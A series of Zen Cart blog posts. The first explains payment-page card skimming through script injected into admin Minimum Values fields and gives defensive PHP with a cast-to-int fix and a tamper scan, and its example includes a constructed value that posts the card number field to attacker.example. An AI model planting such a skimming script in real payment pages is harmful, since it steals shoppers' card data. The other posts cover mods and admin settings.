Payment Page Credential Stealing in Zen Cart

I have seen several successful attacks in the last month on Zen Cart which have used the Admin->Configuration->Minimum Values fields. (osCommerce has a similar vulnerability.) Note that these fields are only editable from the admin, so an attack of this kind also means an admin account or admin session was compromised. The attack works as follows:

  • Inject a script into one of the CC min length fields (in this case, CC_NUMBER_MIN_LENGTH).
  • Because the field's value is echoed into the payment page's JavaScript unescaped, the script fires when the payment page is loaded, provided a payment module that captures the card number on-site is in use.
  • The script sends the captured card data to a remote server with an AJAX POST.

Here’s a screenshot of the Admin->Configuration->Minimum Values field:

[Screenshot: Zen Cart credit card minimum values hack]

A proposed defense against this attack is to cast the configuration values that are supposed to be integers to int before they are echoed into the page, so that an injected string can never be emitted into the payment page's JavaScript. You can see my implementation in Zen Cart 1.5.7 Pull Request #2471. The cast closes the injection point, but if you find one of these fields tampered with you should also reset it to a plain number and work out how the admin value was changed in the first place (compromised admin credentials or session).
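The following is an added example, not Zen Cart's own code or the code in the pull request. It models the injection point described above (a Minimum Values configuration string echoed into the payment page's JavaScript) beside the cast-to-int fix, and adds a check that flags any MIN_LENGTH configuration value that is not purely numeric. The function names, the field name cc_number, the host attacker.example and the sample configuration rows are constructed for the example; only the key CC_NUMBER_MIN_LENGTH and the configuration table's column names come from Zen Cart.

```php
<?php
// Added example, not Zen Cart's own code. It models the injection point the
// post describes (a configuration value echoed into the payment page's
// JavaScript) and the proposed fix (casting to int before output).
// Function names, the cc_number field name, attacker.example and the sample
// rows are constructed; CC_NUMBER_MIN_LENGTH is the real configuration key.

// Constructed attacker value of the kind the post describes: it still starts
// with a plausible length so the length check keeps working, then appends a
// script that posts the card number field to a remote host.
$tampered = '13; var r = new XMLHttpRequest(); r.open("POST", "https://attacker.example/collect"); '
          . 'r.send(document.querySelector("[name=cc_number]").value);';

// Vulnerable pattern: the configuration string is dropped into the page as-is,
// so everything after the number becomes live JavaScript.
function renderMinLengthJsVulnerable(string $ccNumberMinLength): string
{
    return '<script>var ccNumberMinLength = ' . $ccNumberMinLength . ';</script>';
}

// Hardened pattern (what the cast achieves): PHP's (int) cast keeps only the
// leading integer, so only a number can ever reach the page, whatever is
// stored in the database.
function renderMinLengthJsHardened(string $ccNumberMinLength): string
{
    return '<script>var ccNumberMinLength = ' . (int) $ccNumberMinLength . ';</script>';
}

// Detection: flag any *MIN_LENGTH configuration value that is not purely
// numeric. Equivalent SQL against Zen Cart's configuration table (column
// names as in Zen Cart, table prefix omitted):
//   SELECT configuration_key, configuration_value FROM configuration
//    WHERE configuration_key LIKE '%MIN_LENGTH'
//      AND configuration_value NOT REGEXP '^[0-9]+$';
function findTamperedMinValues(array $rows): array
{
    $suspicious = [];
    foreach ($rows as $key => $value) {
        if (substr($key, -10) === 'MIN_LENGTH' && !ctype_digit((string) $value)) {
            $suspicious[$key] = $value;
        }
    }
    return $suspicious;
}

// Constructed sample of configuration rows, keyed by configuration_key.
$configRows = [
    'CC_NUMBER_MIN_LENGTH'           => $tampered,
    'CC_OWNER_MIN_LENGTH'            => '3',
    'ENTRY_EMAIL_ADDRESS_MIN_LENGTH' => '6',
];

// The vulnerable rendering emits the injected script; the hardened rendering
// emits only the integer; the scan reports only the tampered key.
echo renderMinLengthJsVulnerable($tampered), PHP_EOL;
echo renderMinLengthJsHardened($tampered), PHP_EOL;
print_r(findTamperedMinValues($configRows));
```

Run it with `php example.php` to see the two renderings side by side. The scan is worth running against a live database after any suspected admin compromise, since the tampered value keeps the minimum-length check working and nothing looks broken to the merchant.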

Zen Cart Mod Recommendation – zenNonCAPTCHA

I heartily recommend the mod zenNonCAPTCHA. Instead of the clunky usual CAPTCHA technique of forcing the user to type a distorted string or identify images (which is often quite difficult for older users), zenNonCAPTCHA uses a slider test: you pass by moving the slider until the value “Human” is shown. Bear in mind that a slider is a speed bump for generic form-spam bots rather than strong proof of humanity (a scripted browser can drag it too), so keep server-side protections such as rate limiting in place as well. Here’s a screenshot of how the slider looks when it is first presented:

[Screenshot: Zen Cart zenNonCAPTCHA slider at start]

And here’s how the slider looks when you have successfully moved it to Human:

[Screenshot: Zen Cart zenNonCAPTCHA slider moved to Human]

June 2019 Updates to Zen Cart Mods

I have updated a few modules recently:

Blogs I’m following

Like many people, I got out of the blog habit when Google killed Google Reader, but I recently started using Reader (with Feedbin) so that I could enjoy blogs once again. Here’s what I’m reading these days:

What are you reading?

Using Zen Cart Valid Cart to apply checkout rules

One of my customers wanted to use Valid Cart for Zen Cart to apply the rules shown in the matrix below. If one of the products in the first column was in the cart, the customer also had to buy one of the products in columns 3-6, otherwise they would not be permitted to check out.

This is easily done with Valid Cart, which blocks checkout unless the rule passes. So trying to check out with just product 489, for example (which is an add-on product), would not be permitted; the customer would need to add product 334, 385, 361 or 397 to the cart first.

Zen Cart Order Total Edit

Sometimes you just need to change the line items on an order (increase a discount, reduce a shipping cost, or whatever) to keep a client happy.

You may or may not be able to do this with Edit Orders, but even if you can, Edit Orders removes and re-inserts the records in the orders_products table, which may not be desirable if you have additional fields in that table that are set by custom logic (as is the case for dropshippers).

Now you have a new option: Zen Cart Order Total Edit. Hope it helps your business!

Zen Cart 1.5.6b Release Cutoff

The long awaited Zen Cart 1.5.6b Release is scheduled to be initiated on 4/30 (no more changes to Github, file labeling applied), with a zip file created later that week. Here’s the announcement.

1.5.6b promises better compatibility with PHP 7.2+ as well as a number of bug fixes from earlier 1.5.6 releases. The change set from Zen Cart 1.5.6a to the current HEAD is large, containing almost 400 commits!

**WARNING** flashing on tab title in Zen Cart 1.5.6

After the timeout specified in Admin->Configuration->My Store->Admin Session Time Out in Seconds has expired, the tab you are running your Zen Cart Admin in begins to flash **WARNING**.  This is quite a horrible experience – it’s as bad as the old <blink> tag in web pages from the mid 1990s. It’s a blight and a distraction. But the good news is, it’s also really easy to kill!

Edit the file admin/includes/keepalive_module.php

Around line 29, just after

$.jTimeout(
{

add the line

    'flashTitle' : false,

Refresh your admin, and from then on, no blinking! The admin session still expires after the configured timeout; you have only removed the visual alert, so don’t be tempted to fix the blinking by lengthening Admin Session Time Out in Seconds instead.